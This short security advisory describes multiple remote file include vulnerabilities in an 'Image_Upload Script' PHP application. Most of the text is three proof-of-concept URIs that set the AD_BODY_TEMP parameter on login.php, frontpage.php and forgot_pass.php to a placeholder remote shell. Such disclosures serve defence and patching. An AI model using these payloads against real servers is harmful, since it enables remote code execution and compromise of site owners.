Image_Upload Script Multiple Remote File Include Vulnerabilities

Image_Upload Script Multiple Remote File Include Vulnerabilities

Attackers can use a browser to exploit these issues.

The following proof-of-concept URIs are available:

http://www.example.com/imageupload_path/login.php?AD_BODY_TEMP=Shell?
http://www.example.com/imageupload_path/frontpage.php?AD_BODY_TEMP=Shell?
http://www.example.com/imageupload_path/forgot_pass.php?AD_BODY_TEMP=Shell?